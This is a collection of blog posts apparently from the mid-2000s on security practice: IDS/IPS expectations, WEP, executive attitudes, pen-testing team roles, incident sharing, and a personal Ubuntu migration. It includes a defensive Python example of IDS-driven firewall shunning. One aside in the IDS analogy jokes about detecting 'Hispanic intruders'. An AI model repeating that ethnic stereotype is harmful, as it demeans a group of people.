Physical security is present to make sure people don't go where they should not be going, etc. This is not necessarily bad for people as they are not being limited in a way that takes something they would have already had. They didn't have that access anyway, so there is no loss. But when security imposes computer limits (or the technology imposes those limits), no matter the benefit to the company, those actions involve taking away what users would normally be able to do.

Another lesser reason is the presence of physical security and the smiles they can give. Unfortunately, computer security staffers can't smile through the computer as user data flows by their gates. Thus it can be easier to get mad at the unseen people in the security cubes. Likewise, as part of the general masses, people feel a bit safer and unconsciously accept the security of physical security guards and locks much easier than they do technical security measures and limitations. (This is the only stable reason for most of the TSA regulations; they shallowly make people feel safer without being really all that effective once you start thinking about it.)

.: intrusion detection and prevention expectations

There have been a load of posts and discussion on high-profile blogs and mailing lists about the value of IDS/IPS. Richard Bejtlich, Thomas Ptacek, Alan Shimel, Amrit, and others such as the Daily Dave have all chimed in along with their respective gaggle of comments. Lots of people get pretty vehement and passionate about this subject.

An IDS and an IPS are two wholly different things. Any discussion needs to start by laying the groundwork on which one is being talked about. The next step is to describe how the participants define an IDS/IPS. Lastly, review their respective expectations of those IDS/IPS devices.

I really like Alan Shimel's descriptions of the "trough of disillusionment" and "peak of inflated expectations." I really think there are some skewed expectations of what an IDS and IPS are supposed to do. Of the two devices, I really believe IPS is the one that has had such high expectations that it will not be delivering satisfactorily, ever. IDS, on the other hand, has been mistaken to be IPS very often.

To me, an IDS is lumped with other functions such as logging, syslog analysis, intrusion response, snmp monitoring, and other network/performance monitoring. All of these functions tend to detect or record, providing information or alerts during and after the fact. They are passive technologies that do not take specific action beyond ringing bells and blowing whistles.

IPSs are in the same category as firewalls, antivirus apps, spyware cleaners, web filtering proxies, and spam gateways. They take IDS one step further by actually performing some action based on the alerts, from changing firewall rules to dropping traffic to throwing out TCP resets. As such, they run into the problem of stopping things that should be allowed, or allowing things they didn't know were problems.

IDS/IPS functions are not on my list of the top things to have in a corporate or home user environment. An IDS can detect and alert to events happening that may or may not be malicious or problems. This is certainly a valuable function, but not so valuable as to trump very many other things. IDS technologies tend to be the pet projects of geeky admins that have some time on their hands. The rest of us tend to have other fires that need putting out over babysitting an IDS/IPS device.

Personally, I like IDS for the knowledge and monitoring it can provide about the network. And that is what the real expectation of an IDS should be: the information it provides to better inform those who take subsequent action, which is only as good as how well the device, the network, and the tuning are understood. IPS devices I can do without unless the environment is so huge that it needs automated responses, but even then the environment is likely so huge that only a handful of IPS-enabled (active) rules will be turned on.

There is a challenge floating around about whether there are any instances where a company was "saved" (benefited) from having an IDS/IPS device in use. I have not had one personally, but I can certainly think of situations where someone might be throwing internal exploits at LAN systems in an attempt to break into a system, or maybe a worm trying to propagate over the network. An IDS can alert on an otherwise possibly overlooked situation and flag it for investigation. However, as much as an IDS can be helpful, every other layer of technology steals a little bit of its thunder. Network or even host-based firewalls and antivirus will lower the value of the IDS because a lot of malicious stuff is stopped before it traverses the network.

Think of it this way. An IDS/IPS is like a home security alarm system. The IDS will log attempts to break in, possibly track where the thief moves throughout the house, maybe even determine the method of break-in, and will alert the owner that a break-in is occurring and has occurred. An IPS does all of this, but also rings a loud alarm through the house, turns on all the lights and a spotlight, seals away the family valuables, locks all the entry points, and lets loose dogs to chase the intruder away, actively preventing the success of the attack. In light of this analogy, both systems will have had a very valuable effect at some point (that is not to say the IDS/IPS doesn't tend to warn when even an insect alights on the window pane, or that they don't detect Hispanic intruders...).

Update: More posts are popping up on this topic. The Digital Voice has chimed in as well, with a nice post and viewpoint. TechBuddha has some thoughts as well, about finding your own truths and relax a little bit when it comes to arguments like this. Sawaba at SecuriTeam chimes in.

.: network as a toy closet

The weather in the Midwest has just recently taken a dip into the cold ranges with plenty of wind added in. Walking to my car for lunch this afternoon found me thinking about an analogy for how networks are planned and built.

Think of a child's toy closet. At some point, the closet does not have much in it, maybe just whatever the parent puts in there, most likely some child-related paraphernalia like cribs, strollers, and other things not very interesting to children but necessary for initial childcare. But as the child grows up and time moves on, things are acquired and put away. Maybe some new toy franchise comes along and over the course of 2 years the child builds up a nice collection of toys which then get shoved into the closet wherever they can fit. One weekend a television ad book-ended by a favorite cartoon prompts a new impulse purchase later that day for some rather unwieldy toy aircraft that gets pushed into the closet as well. Perhaps a series of books and shoes get piled in there. No child truly likes shoes and clothes, so they tend to get thrown in with even less regard than normal, falling on the floor of the closet or across various toys.

This slow building of toys and items fitted into various nooks and crannies and sometimes just plain thrown in eventually make finding the good toys a little more difficult. In fact, some toys may end up forgotten about for years, sitting in a dark corner along with a few unwanted guests: shells of crickets and other insects. And when a wanted toy is needed, rummaging through the mess to pull it out while hoping the mountain of everything else doesn't topple out on top of it can be a harrowing experience. And we all know that the subsequent shifting of items will mean placing it back in the closet later will find it in a new place tomorrow. If other junk does fall out, chances are it is all just pushed on back inside in whatever fashion it can fit.

This may eventually mean that friends who stay the night can get away with snatching a toy without anyone knowing it. Or they may wreak havoc by pulling out precariously perched parcels only to topple mounds of others.

And what about those toys received over Christmas and birthdays that are sometimes unwanted and unasked for. The useless junk that accumulates due to what other people thought you might make use of, or trendy toys from years past.

Ask any parent how the image of a child's toy closet left uncleaned for 4 years makes them feel.

The only way to combat the closet trash mess is with regular cleaning. Take everything out, and put it all back while culling the unwanted.

Networks are similar. Over time, they can become completely unwieldy entities with lost applications lingering in dark corners, unwanted guests never detected, a mish-mash of interconnected parts that depend on each other to avoid falling over into a mess when in fact each could stand on its own with a little bit of planning. And how can you truly plan for the future when there is no clue what the next hot toy will be, or the next ad that is seen on television with that impulse "must have this now" item?

.: security silver bullet paradox

We have a problem in the security space.

It is widely touted that marketing and ill-informed managers and non-technical C-levels are looking for silver bullets when it comes to computer security. Most security experts will respond that there is no silver bullet. In fact, we say this a lot even though no one is truly arguing this topic...at least not anyone important or knowledgeable about our industry. We seem to just like saying it amongst ourselves.

Now, speak to security researchers about wireless security and the use of WEP. Some will get very vehement in saying that WEP is broken and useless and get rather vicious in deriding anyone who says they use WEP for their home wireless network.

See the problem here?

What is disturbing is our ability to completely reject a countermeasure or protection as worthless just because it is not perfect, while also rejecting the concept that there is a perfect countermeasure. In the above case, WEP may have holes and be easily broken by someone with the knowledge, but it still has value because it can block a large group of unskilled attackers. IDS may be circumventable and may not catch everything, but it still has value to catch the low-level stuff and mass attacks or worm traffic and such.

We should always be careful not to think there are silver bullets in security, but we should not fully reject bullets that are 25% silver either. Every little bit that we can raise the bar for attackers is a little bit more security we will gain.

.: the future looks muddy with privacy issues

As I look forward to the future in regards to security and technology, I really see a very muddy, grey haze when it comes to privacy concerns. Mark Rasch has a nice article where he makes a lot of little, very important points about privacy in the workplace. As we embrace technology more and more, and begin to mix workplace computer use with social computer use, this topic is going to continue to be complicated and muddy. In the past we only had phones that might be used for personal activities now and then, or they might be recorded, although most companies did not have those capabilities. Now, we have many more avenues to mix work life with non-work life, technologically, and we also have many more possible ways to record and monitor (VoIP, IM, blogs, email, files, cells, wireless...).

.: why execs and security seem to be behind the curve

When you can get a report on the attitudes of 213 execs in regards to security, you definitely have to check it out. Sadly, the report is only open if you pay, but Dark Reading has a quick synopsis of it. The synopsis takes a look at why execs are not taking security more seriously.

I love their first conclusion that most execs see security as an operational function (part of facilities) and not a strategic one. Far too often (either due to perception, lack of taking responsibility, or just execs not even knowing their own role) no one thinks about what the true purpose of a CEO is. CEO duties should be strategic, and as such, they do not want to deal with mere operational trivialities. Those are rightly delegated down to upper level managers and such. Some small-medium companies have CEOs that tend to meddle in both areas (especially when that person holds multiple titles like CEO and President), but this should always be evaluated: Where should the buck truly stop for non-strategic issues in a company? Who is signing off on operational budgets? Unless the company purpose is in security or some other critical infrastructure that depends on computer systems, the buck will stop lower than exec levels.

Some other reasons posed: security managers tend to be separate from other business managers which in turn gives them few allies to leverage budgets and attention. They don't know how to align to business objectives.

Execs see security only under certain circumstances, with their main motivators being: meeting government and other regulations, protecting confidential information (I bet that refers to internal company information and IP as opposed to customer data), and business continuity.

What can security managers do? They can reach out to the rest of the business. They can pair up with risk managers. They can get more face time with managers so that they can get some allies to align to their initiatives. They can create metrics that execs can understand so they can get budgets to do what they need to do (e.g cost of business interruptions, vulnerability assessments, and industry benchmarks). The big theme here is to align with other business managers.

One thing this report on the research does not touch on is something I think could help as well. Security is almost always seen as a punishment vehicle, where the freedoms of managers and employees are limited a bit more. Most people think they would rather be free of constraints (the security function) as opposed to governed by them (oddly, I think most people thrive best under constraints and are lost like sheep without fences when given free rein). This means security is seen as a negative money sink that keeps slapping their hands when they want to do things or make money. Really, few people like security. And when they are indifferent, they are usually just denying what can happen (for instance, we all know how easy it is to have our house broken into, but we don't buy alarm systems because that is an overt acknowledgement that we could be broken into; by not buying the alarm system, we subconsciously pretend it is not a problem to worry about...denial).

I feel that security could best be aligned with IT functions (or be integrated deeply into IT functions) or with financial functions. Having a very separated security entity, I bet, can be a very isolated feeling in a company.

Thankfully, I am not a manager, nor do I expect to be one for at least another 5-8 years and all of this is just more information in my head to try and keep an eye on the big picture.

.: 9 things IT workers need

This article (found via Hardocp.com of all places) explains two important things. First, the difference between hygiene and motivational workplaces. Second, the nine things that developers want. Honestly, this can be expanded beyond developers and into network engineers, security professionals, and IT staff in general.

Sadly, I work for a company that is only about 450 employees small, but is firmly of the "hygiene only" mindset. The benefits are excellent, the pay is more than competitive, and everyone is just pretty comfy in their jobs. The company does not score even one point in the motivational items. Even more sadly, those are the points I value the most.

.: call it 0day please

For now, I am refusing to use the term "less-than-zero-day" for a vulnerability that is unknown but actively exploited. Zero-day then refers to an exploit in the wild that is not patched yet, but is known (the time between notification of vendor and vendor-issued patch). I see no use in this cutesy term...just call anything before a patch or vendor-issued workarounds a 0day for all our sakes...

.: linux as main box - part 4: migration

I put my Ubuntu move on hold for a few weeks, but I'm back to it now. Having set up many Windows systems in the past, I know how important it can be to document the process, especially for something new like Ubuntu (hence some of my previous posts on this subject). I've taken to keeping a log of the apps installed, changes, and commands I run.

In migrating to the new system, I'm really happy when programs include easy-to-use exports and imports to transfer information from one system, or even OS, to another. Firefox allows me to export my bookmarks (which have swelled terribly!) and then import them into Ubuntu's firefox. Wahoo! Sadly, Thunderbird does not allow this with mail and mail settings. I can do this from one Windows box to another (just copy the profile folder), but have not yet figured out how to do this over on a Linux box. Ah well, it would only take a few hours to set everything up as I had it before anyway. This just shows how valuable remote services like Gmail and Yahoo are for less technical users. Lose your system or get a new one? Just log into webmail and you're back where you were before!

So, the migration is moving forward. The last task to (nearly) fully get away from booting Windows is to utilize wine and vmware. I searched for some information and stories on installing vmware workstation and found this amazing checklist for an Ubuntu install. Much like so much coding, why reinvent the wheel and make my own when I can just borrow chunks of this guy's checklist? He even has most of the steps I've already gone through, and it looks current! Definitely an inspiration and a great help in making sure I have what I want.

Hopefully by the end of the week I will have a vm set up for Windows which I can pop open when I need to quickly use some Windows program without booting over to my Windows install. In addition, I'd like to get one or two things to work in Wine as well, but the VM is an easier and quicker step for me right now.

As far as getting more things to work, I've become very happy with mplayer as opposed to Totem (the default Ubuntu media player). Totem did not like Divx files (been downloading HOPE presentations) but mplayer rolled right with the punches and played them back just fine.

.: security really can stifle business initiatives

(Sometimes I do some thinking on my walk to my car for lunch; sadly, the time when I usually don't have anything upon which to take notes...)

Since I openly contrasted my latest two jobs earlier, I was thinking about their differences. My previous job preferred to get things done, and think about security later. My current job has a few people who prefer to wave security around as a business barrier.

But perhaps that is just something security will very often be. Something tacked on only after it is known that something will work. Why stifle a business or initiative with security when you don't even yet know if the business or initiative is even viable?

I think this is why developers and programming instructors have such a hard time with security in applications. Functionality is the key component. If it has security but is too late to save the business, what good is it? If it can be delivered on time and let the company flourish, but with less security, is that not better?

But how far do you go with security or insecurity? Therein is the art of risk (which I truly think is an art, and more difficult than anyone really expects). Do you kill a business by paralyzing it with security paranoia and control? Do you let it run rampant with zero security and not even any locks on the doors? Do you do just enough to satisfy negligence? Do you fling up stop signs or just directional cones?

Like every discussion on security, there are exceptions, there are varying levels and tolerances between technologies, companies, managers, and so on. Not only do we not have a silver bullet device to provide security (and never will), but we also don't have silver bullet methodologies or even approaches that can cover all those differences. Therein also lies friction between finance/auditors, management, and IT/security. It can be artful, subjective, which flies in the face of objective approaches...

One thing we do need, as security practitioners, is the constant harping of media about security issues, whether accurate or not. Too often security is only focused upon after an incident or after some insightful awareness presented to management in dreams of angels and fire...but at least media can help keep the minds that be where they ought to be.

.: the pen testing team

Been thinking now and then about being on a pen-testing team. Oh how I would love doing that job! So, sometimes I think about the make-up of such a team. How would I design one? Now, I'm not a business manager, so having a 50-person team may sound great but is likely not cost-effective. So, I'll try to give my take on a "perfect" pen-testing team and their roles, as sketched in my own head. Note that some of these roles can be combined into single people.

The Lead - You need to have a lead person, most likely a very presentable and articulate senior person who is most likely to be the face of the team to the client. This person should also have coordination and delegation duties and be almost like a manager, most likely with some managerial experience to manage the team properly, keep them motivated, but also be able to relate to client managers. This is the coach and mentor.

The Interviewer - This role is an expert when it comes to policies, regulations, standards, and interviewing the proper people in a proper way to get definitive answers on a company's strength with its people and processes and policies. Someone should, at the very least, be able to interview others properly and understand regulations inside and out (COBIT, PCI, etc). This person should be able to evaluate whether reality matches policy. This guy would be as close to an auditor as the team gets, and could also be familiar with risk analysis.

The Writer - Every pen-test includes reports and deliverables, and the more polished those deliverables look, the better. Every team should have someone who is strong with writing documentation, compiling information, evaluating results, correlating the risks to the client, and dealing with information in a constructive manner. This person can also be the information-gatherer who can utilize search engines, DNS queries, and other reconnaissance means to profile a target. Even better, this person should be adept at vulnerability assessments and determining how important particular vulnerabilities are.

The Junior - Let's get this guy out of the way early. There should always be some new blood on the team in the form of a junior guy. This guy may have any level of skill, but is the one doing the "easier" errands on the team: host sweeps, port scans, vuln scans, password cracking, and coffee-fetching. In fact, this guy can also do some of the widespread repetitive things like exploiting various systems using automated tools, sifting through confiscated data and systems for juicy information, and might also be best suited to help support the systems for the rest of the team.

The Web - Any real pen-testing team should have someone proficient with web coding practices and languages, and the security of them. He or she should be the lead when it comes to source code analysis, web app scanning, fuzzing, SQL injections and queries, and best-practice approaches. A background in web servers and database servers would be beneficial.

The Exploit - Someone on the team should also be proficient with other coding disciplines such as Perl, Python, C++, and so on. They can work with and devise exploits, either pre-discovered ones from outside sources or custom scripts to discover new ones. This person should also be able to evaluate, fuzz, and test applications beyond web-based ones, such as web servers, email servers, DNS, etc. If a port is open on a server, this member should be the one poking at it the most. This guy should be an expert on buffer overflows (stack and heap) and most likely on malware creation and reversing.

The Packet Hound - Part of any pen-test should include networking devices and information leakage directly on the wire. Packet hounds tend to love sniffing traffic, tinker with networking devices, know the ins and outs (and arounds) of IDS/IPS and firewalls, map the network, and be able to penetrate and evaluate network devices and configurations. This guy should also be familiar with VoIP, phone systems, and wardialing. If you want a meaningful network tap in a crowded server room, this is your man.

The Wireless Expert - These days, wireless and mobility are a big thing. It is a benefit to have a team member who is proficient with wireless technologies to evaluate and penetrate the security of mobile devices. This should include PDAs, laptops, and wireless networking.

The Social Engineer/Thief - Any team doing black box or physical assessments should have someone skilled with social engineering. There is no more successful an approach to breaking into a network than social engineering. This person should be adept at the common approaches to getting people to divulge information or do something that is otherwise a security risk, from opening email attachments to holding the door open after a smoke break. Lock-picking and physical security alarms and countermeasure knowledge is necessary; perhaps even someone with burgling experience and the willingness to get dirty with dumpster diving. (Note: since this is a rather fun and different task, other team members could enjoy helping out as long as someone on the team can act as a lead expert for this activity.)

.: incident disclosure and information sharing

They don't post all that often, but when they post, they post excellent stuff over at ClearnetSec. The latest post touches on an investigation at a financial institution in regards to an apparent compromise.

We desperately need more reports like this. No, I don't need to know specifics or enough to know who the victim is, but we need to know how these things are found, what worked, what didn't, why did it stay undetected for a year, what else did the attacker do? Was it just one mistake that let them in and they could slowly own the whole network?

We have tons of journalists and media reporting on best practices and how to theoretically protect data and what should and shouldn't be done in retrospect to the big media-covered incidents. Very few of these reports seem to be written by people experienced in the trenches, experienced with the trials and realities of the network. They are all very pundit-sounding and academic dreams of puppy dogs and sunshine and flowers.

We need to move away from those media reports and theoreticals. We need to divulge information amongst ourselves and figure out the reality. It is golden when you can take out a pen tester for some beers and start shooting the shit about how they've yet to test a company that wasn't rooted, or what works most of the time and what doesn't, or where some of the oft-overlooked nooks and crannies of networks are, or the most obscure attacks they've completed.

We need more surveys and reports like Jeremiah Grossman's surveys about web application assessments and security, only we need them about actual compromises, either real malicious ones or pen-tested ones. We can't wait and pretend they aren't there, nor can we wait for the budget or big media events to remind the C-levels about the risks. We need real, technical reports. Give me a technical report, and I can distill that down to language my parents could understand. That's what I soak up.

.: the future battle in computing architectures

Every now and then an article is published that is not only a pleasure to read, but is just packed with information and true forward-thinking content. I just read such an article from Wired.com about the future of searching and computing.

This article intertwines the stories of Google, Ask.com, and other search engines with the future of technology. The rise of RAM. The age of low-cost massively parallel computing (cloud computing) and the fight it will have against decentralized computing (and information). The emphasis on network speeds. The usually unthought-of challenges and costs of electricity and cooling for such huge data centers. China and their pursuit of nuclear power.

An excellent article packed with tons of tidbits around the core themes and dressed up with beautiful writing.

.: movie insider causes revenue loss

We need more technical reports of incidents, damn it! However, it is fun to infer various tidbits based on traditional media reports like this article about a previous manager causing revenue loss in a movie theater chain. The man was able to cause the chain's e-commerce sites to not process online ticket sales for a period of time.

What I found most interesting is that a wireless adapter was identified as a culprit. This implies that the movie chain had wireless employed. Enough such that this former manager was able to get into it and also access the web servers or other critical infrastructure. This is terrible network design, security, and architecture.

This man was the former director of information technology. Perhaps they didn't have anyone around after they eliminated his position to ensure that passwords and access were revoked. Maybe they did change it and he just broke in on his own accord, but any time an employee is removed against his or her will, evaluation and action must be taken to ensure they do not retaliate.

.: taking back security

After reading far too much vendor-crap this week, and publications and reports whose basis is in the industry ("We now need to get away from firewalls and IDS and protect data..." translates into "We've saturated firewall and IDS markets and need to drum up the next big market to hawk our warez in..."), I've decided that security professionals (and IT in general) need to work hard to take back our reports. We need to wade through and chase away the ghosts of all these vendors pushing their own agendas as the next big thing, and get back to reality and what really needs to happen.

For all the hype and reports, you'd think we don't need patch management, inventory control, or firewalls anymore. At all. Or that once these things are implemented, that's it. Move on. Fuh-geddaboutit! Oh wait, we need to monitor and update and take care of these things and check logs and stuff? Wha...?

Yes, we need to take this all back and let the vendors shout noise at each other in the ad-driven mags. We need to make doubly sure that all this noise doesn't blow in the face of our managers like so much thick hot air, sending them off to chase the next big thing and dragging us all with them whether it works or not.

.: barriers to sharing information

At work my IDS popped up an alert that IP 123 performed a host sweep against our webservers on ports 80 and 443 (and maybe more, but the IDS is not that good...sigh). I check out the IP and it is a webserver for an NBA team. The website itself has little mention of how to contact someone about the site, but I do find an email in the privacy notice. Great. In the privacy notice I see a blurb about how the site is highly secure, blah blah. Great. So I sent an email to the legal address I see and get an immediate undeliverable message. Great.

By now, I have other things to be doing and so on, so I just drop the issue. This web site might be rooted, I might be seeing actual traffic from a malicious script, attacker, or something bad inside their network that I can't see. Perhaps it is legitimate traffic and someone is just spending some spare time scanning all websites on the Internets to help with the Google. But unless there are clear avenues to report these things, they can only hope their own internal detections will find if something is really wrong. :\

.: linux as main box - part 5: windows strikes back

So, I have a VM of Windows XP running on my Ubuntu laptop now, so that I can do those few things that I need Windows for. Sadly, Windows and the Activation nag don't seem to be on the same page. No matter how many days I wait, it nags me that I have 30 days of activation left, but I am unable to activate my Windows, even manually by inputting the key found on my laptop case. Well, as long as it stays perpetually on 30 days, that is at least tolerable, but I need to research why this happens and if I can fix it or redo the VM creation to alleviate the problem. I remember a popup warning about it when creating the VM, and I may have done something wrong.

Of note, the only thing I do on a daily basis that has not been moved over to Linux is my email from Thunderbird. I guess I could take some time and just move over, but it is all the older email that I need to wade through and catch up on first. I'll maybe just end up losing all that mailing list email I've built up...

Watching HOPE 6 presentations this weekend gave me more excuse to shore up Ubuntu's media-playing issues, including mp3 support. Very happy with XMMS and MPlayer.

.: when security goes too far

An article just ran across my desk about a bank whose legitimate (albeit poorly implemented) email announcement to customers was mistaken for a phishing attempt. This is an example of a false positive. But just how damaging can a simple false positive be?

What we do now:
- automatic spam filters that "learn" what spam is
- manually populated spam filters
- spam blacklisting which can blacklist sources or content across a wide swath of customers
- heuristic and behavior-based virus scanning
- phishing site blacklisting
- blacklisting of DNS, domain, or IPs based on complaints or automatic alerts
- network and system shunning via IDS/IPS linked to firewalls

That's a lot of stuff reacting to security incidents. What might have happened to this company? Someone may have reported them to a phishing blacklister or alerts may have automatically done this, blocking perhaps the domain, emails, website IP, or even DNS for this bank. This could cost tons of money in lost business, public relations, and direct costs to fix or workaround the issue.

In a previous job, we sometimes were blocked from emailing AOL members because, after a complaint or two, AOL would block our email servers for 24 hours. The sad thing is, we never spammed people unless they or their own employer requested it or agreed to it. Also, one of our clients, a major financial institution, at one point had their domain blacklisted for spamming. Now, they may have really been spamming, but due to that disruption in service by being placed on a blacklist, they had to change their domain name and all the infrastructure that used it. Wow!

And as much as people like this stuff, mistakes will still be made. People will make bad judgements, misconfigurations, or poor decisions like the bank email security campaign linked above. To make a mistake and cause your company millions is just a bad situation waiting to happen.

Dan Kaminsky was correct in his talks last year (BlackOps of TCP 2005) describing how scary it is to have IDS/IPS automatically making firewall rules and shunning networks. This means that attackers can actually write your firewall rules and can do some things as disastrous as having your own network shun its own name servers and be subjected to DNS poisoning.
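As an added illustration of that failure mode (my own example, not from Kaminsky's talk or any IDS product): a shunning policy that refuses to write a DROP rule for its own resolvers or upstream ranges, ignores alerts whose source address could have been forged, and caps the number of rules so the rule table cannot be filled remotely. The hosts, ranges, alert fields and the `spoofable` flag are all constructed placeholders.

```python
"""Shunning policy for IDS-driven firewall blocks (added example, constructed data)."""
import ipaddress
from dataclasses import dataclass, field

# Placeholder addresses for the network's own critical hosts and ranges.
# Whatever an alert claims, these must never end up in a DROP rule.
PROTECTED_HOSTS = {"10.0.0.1", "10.0.0.2", "10.0.0.3"}       # gateway, primary and secondary resolver
PROTECTED_NETS = [ipaddress.ip_network("203.0.113.0/24")]   # e.g. the upstream provider's range


@dataclass
class Alert:
    src: str          # source address the IDS blamed
    signature: str
    severity: int     # 1 (informational) .. 5 (critical)
    spoofable: bool   # True when the evidence is a lone packet (UDP, bare SYN) whose source could be forged


@dataclass
class ShunPolicy:
    protected_hosts: set
    protected_nets: list
    min_severity: int = 4
    max_active: int = 50                           # cap: an attacker must not be able to fill the rule table
    active: dict = field(default_factory=dict)     # ip -> signature that triggered the block
    rejected: list = field(default_factory=list)   # (ip, reason) for alerts that did not become rules

    def is_protected(self, ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return ip in self.protected_hosts or any(addr in net for net in self.protected_nets)

    def consider(self, alert: Alert) -> bool:
        """Decide whether one alert becomes a block. Returns True if the source is (now) shunned."""
        if alert.src in self.active:
            return True
        if self.is_protected(alert.src):
            self.rejected.append((alert.src, "protected infrastructure"))
            return False
        if alert.spoofable:
            self.rejected.append((alert.src, "source not verified"))
            return False
        if alert.severity < self.min_severity:
            self.rejected.append((alert.src, "severity below threshold"))
            return False
        if len(self.active) >= self.max_active:
            self.rejected.append((alert.src, "rule cap reached"))
            return False
        self.active[alert.src] = alert.signature
        return True

    def rules(self) -> list:
        """Render the active shuns as iptables rule fragments, one per blocked source."""
        return [f"-A INPUT -s {ip} -j DROP" for ip in sorted(self.active)]


def run_policy(alerts):
    """Feed a batch of alerts through a fresh policy; return the policy and each decision."""
    p = ShunPolicy(PROTECTED_HOSTS, PROTECTED_NETS)
    return p, [(a.src, p.consider(a)) for a in alerts]


# Constructed alerts: one genuine attack over an established TCP session, then three that
# could have been produced with forged source addresses, including one naming our own resolver.
SAMPLE_ALERTS = [
    Alert("198.51.100.7", "web server: SQL injection attempt", 5, spoofable=False),
    Alert("10.0.0.2", "DNS spoofing attempt", 5, spoofable=True),
    Alert("203.0.113.9", "port sweep", 4, spoofable=True),
    Alert("192.0.2.44", "port sweep", 2, spoofable=False),
]

if __name__ == "__main__":
    pol, decisions = run_policy(SAMPLE_ALERTS)
    for src, shunned in decisions:
        print(f"{src:15} {'SHUN' if shunned else 'ignore'}")
    for ip, reason in pol.rejected:
        print(f"rejected {ip}: {reason}")
    print("\n".join(pol.rules()))
```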

.: on the forefront of technology

A quote from an ITBusiness article:

"You gotta be mobile, regardless. While it may pose great [security] risks, its a greater risk to fall behind," Levy said."

It goes without saying that you can't let your networks and systems linger and gather dust so much that we get another, "it's 2004, why are you still running Windows 98 systems?" situation. As support drops off, so too should use. Just look at SCADA systems on what not to do...

However, there is still something to be said about being on the forefront of technology and to not be sitting around playing catch-up five years behind or more. I think it could help IT perception if IT were closer to the forefront of technology and enabling and assisting employees more. This might be a bit dangerous in some cases, but I think in most cases the only real danger is just overspending on new things that may or may not work out in the long run. Thankfully, technology these days does not necessarily have to be a bad decision made that will last 20 years...or even 5 years. Everyone in business makes mistakes. IT should be held in no different regard. If we move forward with mobile devices before they become fully mainstream and it doesn't work out, so what?

I could go into a lot of the benefits and risks and goods and bads, but I think it is interesting to imagine the change in approach when it comes to just doing some things, and figuring out the security later. Perhaps this is a bad idea for most, but it is still something to always think about. Why wait 3 more years before encouraging mobility in the organization? Why not just do it now and deal with the risks, issues, and technology? Why wait for users to clamor louder for IM, and instead move forward with dealing with IM in the organization now?

Now, this is weird for me to be saying. I typically am not an early-adopter. But I do have an excuse. In college and beyond I have not had a very large amount of leisure money at my disposal in order to delve into new things. My attitude is certainly ready to change now that I am crawling out of debt such that I can see the edge clearly now.


Another quote from the same article:

"Levy suggested that access-based protections (like dual-function authentication) are imperative, and end-to-end encryption is necessary. These technical failsafes should form the foundation for rigorous employee training from the IT department, said Levy... The employees need to become experts in mobile security, he says."

I don't like this statement. I think the average user needs to get used to doing things with security in mind, but it is ridiculous to request that employees become experts in mobile security. Mobile security is tough enough for professionals working with it every day, let alone everyone else trying to do their own jobs. While training is necessary and employees do need to be at least a little bit security-conscious and accepting, it is up to technology and technology professionals to be the experts in security. We do not expect everyone to be an expert about the internal workings on their car or the proper use of complicated and ephemeral security measures. Instead, they just work, they just do their thing, and we take our cars to the professionals for anything beyond our control or understanding.

.: least user access

I almost always read "least privilege" or "least user access" and click into the article wondering what it will be. Without fail, it is always about that age-old discussion on whether users should be running as admins on their local machine or not.

What about the other aspect of least user privilege? Namely, the file servers. How are company file server resources allocated? How are requests for access to information handled? Not everything is in databases or web applications. So, what about this very important topic?

I wonder if this is because very few people understand the nuances of managing security permissions in anything but a tiny environment (at least, the IT journalists anyway). While it might seem easy to isolate developer files, what about when we start talking about collaboration or dynamic teams that span multiple departments?

Weird, considering I would expect many organizations to be very bad about tracking and reporting on actual user access or even managing that access at all.

.: security denial by lack of action

We have a lot of denial about security in our society right now.

Many people will admit, sometimes after a few thoughts, that breaking into someone's house is typically not that hard. Watch "It Takes a Thief" on Discovery and you'll see that the same fundamental issues occur most of the time. But as much as people will grudgingly admit how easy it could be, that is typically just unthinking lip service. Very few people, inside, admit they can be victimized. Very few people take the time to implement fundamental security measures that greatly impact the risks of a break-in. Something as simple as a security alarm and proper locks on doors. But yet, very few people do these things...and then shed tears and feel violated when they do suffer a break-in. Do we just like to pretend it won't happen to us? Or do we just not want to spend the money or the effort? Typically, all it takes to break into someone's house is a little bit of effort and some balls enough to overcome the internal sense of right and wrong.

Identity theft is still very easy to accomplish. But most people, while they will grudgingly admit that it is easy, still make little to no effort to protect themselves.

Security is often something that is talked about, but never truly taken seriously enough to change behaviors until after a security event. I would bet it is unanimous amongst people who have suffered a break-in that they wish they would have had more measures in place, and I bet most have them now.

At any rate, it is interesting that security can be something that sounds good when people talk about it, but they still too often end up doing nothing, and by that lack of action, end up denying that they can be victimized.

.: wireless driver flaws highlight 2005

I was putting up a list of things to "predict" for next year, for my own amusement. It looks like one is coming true sooner than intended as the Month of Kernel Bugs has released a second wireless driver flaw along with a Metasploit exploit.

There are three reasons this is huge right now: 1) lack of patching channels, 2) lack of hardened drivers, and 3) growing emphasis on mobility and wireless.

While Windows and other OS and software apps have various levels of seasoned updating and notifications, the driver community has no such luxury. In fact, neither do the corps who use hardware drivers like Dell, Gateway, HP, and so on. Customers are really on their own to know there is an issue, know how to find the right driver (still easier said than done on most of those sites), and install it properly (still sometimes a very arcane and archaic process).

This is a huge mess that isn't waiting to happen anymore; it's happening now. I now predict that 95% of all affected systems will not be patched until they are either rebuilt or retired to a garbage heap.

Second, drivers have long been relatively untouched in the media, and as such all their vulnerabilities and code issues have remained in the underground, if anywhere. But combine wireless proliferation, fuzzing, and virtualization, and it was just a matter of time before hardware drivers got the evil eye. Sadly, driverland is not ready for such attention, and I expect a lot of vulnerabilities to be exposed in the next few years in various hardware devices. The code is soft and not hardened over years of exploits and poking.

This is also important because of the growing prevalence of widespread wireless capabilities and laptops roaming around all over. And how default settings leave wireless network cards turned on. All it takes is a running laptop with an active wireless network card to be exploited. It doesn't even need to be associated with a network, and it can be rooted. It can then, possibly, spread.

I also predict there will be some wormable exploits popping up, but thankfully they should only be problems in larger hotspots like airports or college campuses or muni-wifi implementations. However, this could still slowly spread from laptop to laptop in an apartment complex or metro area.

.: the road to web 2.0 - myspace is out of place

If we're in web 2.0 right now with Gmail, Ajax, Ruby, YouTube, Flickr, and so on, what was before that?

web 0.1 - The first web sites; not much to speak of, and I doubt any still exist.

web 0.5 - Around 1995-1998ish with the annoying proliferation of flaming torches, animated rainbow lines, embedded midi, and terrible design. GeoCities is a household name (albeit in geek households).

web 1.0 - Everyone can be a web designer, and designs actually started to mature and not look quite so "GeoCities." Embedded midi is out. Animated gif attacks are out. Stylesheets and databases are in.

web 2.0 - Not everyone can be a web designer. Programmers and extra-mile languages are taking over to offer full application-style sites. Objects are in, playing with code is out. The tools are sophisticated enough that web newbies don't need to code, they can click buttons, sliders, toggles, and otherwise drag-n-drop content.

